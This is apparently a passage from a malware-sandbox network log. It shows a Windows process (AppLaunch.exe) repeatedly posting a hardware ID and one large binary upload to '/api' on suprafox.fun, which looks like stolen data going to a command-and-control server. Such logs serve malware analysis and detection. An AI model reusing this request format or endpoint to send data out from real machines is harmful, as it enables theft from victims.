Oct 24, 2023 00:06:42.820894003 CEST	207	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:42.822035074 CEST	208	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:43.297738075 CEST	209	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=t8gsmcrol3uiah4b7h9u5n8omo; expires=Fri, 16 Feb 2024 15:53:22 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BatOCTQcPNiCL0MEllXTbQs79rWdrL1i0ZQ5JzmwKFaBtMEPIILHbTztoOlBGktcHNtIfvO8Zry%2FEBInu3synlSx9aSeHHXDWqf%2BsG%2BtESdmWc4NK0Oq%2B0qvjAQ9FP0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49edddb73926-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:43.297795057 CEST	209	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49776	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:43.725397110 CEST	210	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 595639 Host: suprafox.fun
Oct 24, 2023 00:06:43.728351116 CEST	222	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:43.818947077 CEST	223	OUT	Data Raw: ee 55 fe fb c9 da 3e b9 cf f7 9e 1b e0 14 a7 f5 e5 f5 ed e6 79 5b d0 66 ed 5f 5e ad 62 c0 be 5b 49 d7 6b 33 f6 33 98 05 8e 56 ff d3 68 34 9a 7e 44 fd 6f 30 32 54 36 d7 8b 0c 93 d1 8d 21 ff 93 de d7 f5 ba c0 21 72 b9 7e 18 e0 a0 fb 5f 5b 5e 38 04 Data Ascii: U>y[f_^b[Ik33Vh4~Do02T6!!r~_[^8fFkUVu.,[ro{JKuMqYekw]8dG?q\_1cf/Y>?&/sztN? ))*y?
Oct 24, 2023 00:06:43.823263884 CEST	226	OUT	Data Raw: 96 bb 7f 14 38 a3 fe 37 b6 fd ef e6 d0 fb 78 7c fe e7 75 40 f5 bf fe f8 1f d2 67 ff 2b cc a7 46 52 b9 7a bf 66 2a 9d fa df 95 64 78 9d a4 d0 ff 46 4a a7 1d ff bb 6c cf 71 b9 29 f2 3f 6b 78 71 b8 f1 91 fd c1 ff 5c 36 98 b8 e0 2e e3 72 03 ef 73 ed Data Ascii: 87x\|u@g+FRzf*dxFJlq)?kxq\6.rsO+]7sBR/s?k8R~:N28>)IHG~<\|Gyd0BZ8!cxxjr#W8_1fy!AU
Oct 24, 2023 00:06:43.823364973 CEST	231	OUT	Data Raw: f6 bc b8 a6 0f 75 7d dc f0 e8 98 ec f7 e5 7e 27 fb 7f c9 f3 e4 9c 5f ac 0f c8 d7 00 e4 19 26 eb eb a7 ff c1 00 65 ed df ca 3f 37 73 53 e4 7f 45 3e 35 e8 8e a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fe a7 fd bf 63 Data Ascii: u}~'_&e?7sSE>5cxkwf`>h W2>Z& m:pIv\|q>]5 dU=^M}Q3x$UZ?s\|=aM@Y5h
Oct 24, 2023 00:06:43.823443890 CEST	233	OUT	Data Raw: b0 40 e9 84 c9 f9 db 4c b4 6b f4 f1 ba 3d de 0b dc aa b7 4b f7 f6 c2 ff 70 3e b9 1f cd f9 c0 1a 80 0b 67 4c 4e e6 85 d0 bd f9 da 7e 78 0f 0f 44 4f 30 8c 50 d6 08 52 6d 20 6a fe 30 2b 04 2e 29 fb 76 f9 0c 5f 3e ef 83 cf 03 91 66 c8 ed 0f f5 83 b0 Data Ascii: @Lk=Kp>gLN~xDO0PRm j0+.)v_>fAzK.EFuA9\|('0~[8K3<yL~>}3"#\{v:g\'~;SsQyp``?0mf~:WU
Oct 24, 2023 00:06:43.824053049 CEST	236	OUT	Data Raw: a6 4b bf 4d f2 cc ef 0e 6c 4e db 2d fb cc 74 9c dc 90 8e 1f 17 ff 9e fc 9f 6f 79 fd 45 8e df 8c ec 96 fe 73 9a f6 ee d9 d6 1f b1 0e 61 d9 39 24 ea 7f 69 ff b3 06 38 d6 fd af 0b f3 7f 47 93 ff 15 cd ff e8 d8 ff 4e 6e 26 a9 7b 16 88 fa 5f d6 ff fa Data Ascii: KMlN-toyEsa9$i8GNn&{_;Z^_sH>g++HvG~_a<_Lb[&&j\km]'~z}?+\|Loz;]4sba0?;cdW~qk@i
Oct 24, 2023 00:06:43.824125051 CEST	239	OUT	Data Raw: fe 65 e6 c1 7b e3 19 c4 e1 77 5b 7a 54 14 7a ce 47 4d f4 db 7f 2f 7e f6 3b af 27 2f 9b 9d 3c 3b ed a7 6b 4e 89 9f 7d 17 f6 ec bb 84 9f 43 bf 29 ac ec 94 2b 4c b2 fd 60 7c 9c bb 22 59 1f ed ff 74 f8 2c 3f 0b b7 29 73 e3 e7 23 8b a3 fb 2e a2 f7 1b Data Ascii: e{w[zTzGM/~;'/<;kN}C)+L`\|"Yt,?)s#.Nt}YggGfo{j?;?"C4?cyO:#wdw^fY tgb$oJ~He<?aPOo_2;<{G8__o
Oct 24, 2023 00:06:43.824196100 CEST	244	OUT	Data Raw: 9e a2 fe 5f 3e 2f 58 ce fe a8 b2 fe 9f 2f 9d f8 1f 9f f9 5b c5 ff 52 f3 7d 99 f5 c9 3a 41 3e 07 24 71 41 e1 7f 54 c3 c7 1d 90 cf 01 c6 fa 80 ae f5 ff d0 0b 4c f3 7e d1 ff 2b 4d ef e2 6d 03 e7 bc 0f 1e f4 f9 92 f9 e1 38 5d 47 db b6 86 70 87 49 c9 Data Ascii: _>/X/[R}:A>$qATL~+Mm8]GpIY{14=?u~^? 9N?>`m@\|d[Emb?~sNYhPOp R2^
Oct 24, 2023 00:06:43.824340105 CEST	246	OUT	Data Raw: af a8 d7 d7 77 3c 35 fb 83 39 60 51 af af cf fd 60 82 65 7a 85 a5 ff 5d ba f3 84 8c ff c1 fb 92 fd b2 4f d8 61 81 b4 8f f7 fa 2e 62 b3 43 50 e7 47 16 88 da 40 38 21 9d 8f 9a 40 69 7a 72 1e 48 91 ff b9 d6 fc 4b dd 4b f4 ff 66 0c 90 f5 ee c2 f4 30 Data Ascii: w<59`Q`ez]Oa.bCPG@8!@izrHKKf0'k03^h?>ka/?n\|?8`Cl(@\n!?*Gyws?Z<WOWOOW
Oct 24, 2023 00:06:43.912708998 CEST	249	OUT	Data Raw: 6b ce 87 ab d6 8f 1f cb f3 bf d6 6c e0 72 f3 3f b8 fd 61 5f 5e ff af 5c eb 0f 75 7f 34 fb d7 55 ef 27 fd cf 35 f3 83 07 f5 81 72 7d 3f 7a 7f f1 b6 81 d3 fe 52 b3 44 d8 ac 0f 57 50 f3 47 6e 87 d9 1d a8 df e3 3d c1 79 f5 7e bc df 17 c1 3a 82 d2 ff Data Ascii: klr?a_^\u4U'5r}?zRDWPGn=y~:d/?Gd\|x/\5\|7E9S$rnCgaN%kgH%s2+cQo+J3WtmE~S_??
Oct 24, 2023 00:06:45.853336096 CEST	819	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=pl64ru4843tenc0f60a67etsn8; expires=Fri, 16 Feb 2024 15:53:24 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YrFOKrnBCqiFGeZ56QgXmnAOq53SO%2FH%2BZYmL3%2BBPhgb4pSQFVgx8F%2B2pe73zPb3jsSiYz2ITO%2FtRECDB8klxhq2jTpCFc%2F7pvIW%2BfPvqzq71yVBNGuvR3PyfnxKlRBk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49f3798f3901-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:45.853387117 CEST	819	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49742	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:06.406965971 CEST	34	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:06.407931089 CEST	35	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:06.873035908 CEST	36	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=7jo7p36pm0jtp46a03728565rt; expires=Fri, 16 Feb 2024 15:52:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JiTIIVoVYhOflxClIfeZaqwiSAQJMkJHpc0tYy79yYv8KrYzsILKjUIpQ2QTl8u6tgpfgPg8bRRwxCLlIISMQbs7vtiW3p0VsKYeaOGig07urftDdCK6MsR%2FrrZ4U8w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad490a49aa1773-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:06.873050928 CEST	36	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49743	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:06.980382919 CEST	37	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:06.981134892 CEST	37	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:07.394889116 CEST	38	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=sg3obad3v4bag9t70u7cds0kdc; expires=Fri, 16 Feb 2024 15:52:46 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N5i513NUk4gng%2FDEFYeL%2Fdq1wOtSObpUPuXvUZb6IeJPdmYrQkcjD4AfUNj2cZqE3FzbihpT20kwt%2FlQgagkFmiL2EtCOLrcpgIAqFGm3GflsnLX6%2FLaTEMoMWeRCDI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad490dda9c3adc-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:07.394906044 CEST	38	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49744	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:07.500668049 CEST	39	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:07.501434088 CEST	40	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:07.917114973 CEST	41	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=0h4e1icaitajgbebhlmaeic7bv; expires=Fri, 16 Feb 2024 15:52:46 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ofJIoM7XiA20LybsLOwvCtZnn%2FNflWEMeHNsuZnEC45hoZycCbERYxTLkZrlWG3bdR8Kkb3sXFyvVy5qOcTRWu5Ng1mC2uisz8KRXYbNkzs1MU4Vhm6UUJ9y5hwoSWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49111f68584e-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:07.917128086 CEST	41	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49745	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:08.024420977 CEST	42	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:08.025211096 CEST	42	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:08.447432041 CEST	44	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=vum34fdm1bf4ooftnjakq9gobh; expires=Fri, 16 Feb 2024 15:52:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lgQe4yyjsWMXYcqgjPYW8k8VWBVSqz0ScVXOhUIdnORJeRdN1D1dcNEYzAw%2Brz87wej9SaIWqgFAOG%2BNbfPVom5a%2BrKGVmvZQFU55hFBSz3bv5Jrf%2BHJTAfzVn1Xnfw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4914593d8192-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:08.447484970 CEST	44	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49746	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:08.555258989 CEST	44	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:08.555947065 CEST	45	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:08.970582008 CEST	46	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=i2i6h1uk2jri5n6tksm1vcufdc; expires=Fri, 16 Feb 2024 15:52:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OABHCliyfLKcHKGE2%2F4Es4ak9gwhteqEbl9mxyw5a5djgrGyyCYpn9FCvXQU%2FgXQf7h53UkDdsN%2FbeMBJVTAY8Q1StYOQ%2FrarBI%2B%2FdBThGGL7gShYQ1Pyzg%2F%2FID8IjI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4917bf5b6fbf-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:08.970633030 CEST	46	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49747	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:09.089277983 CEST	47	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:09.090106010 CEST	48	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:09.386002064 CEST	49	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ssndpv90mp6h6v0q4bfh1a2j3r; expires=Fri, 16 Feb 2024 15:52:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4eedRIVFx0Ft516oxCk2YcqXnay2%2Fu0ZPCmJpRlUYgSvDEW9QlzNBFTx%2FPw8OobRO%2BoocHFk5igHGDDenVHncBfnUPJQ7MqqIFrm2wggP%2Fzsl6RU4tQspwVh6tTz%2FRs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad491b097281f3-IAD Data Raw: 32 0d 0a 6f 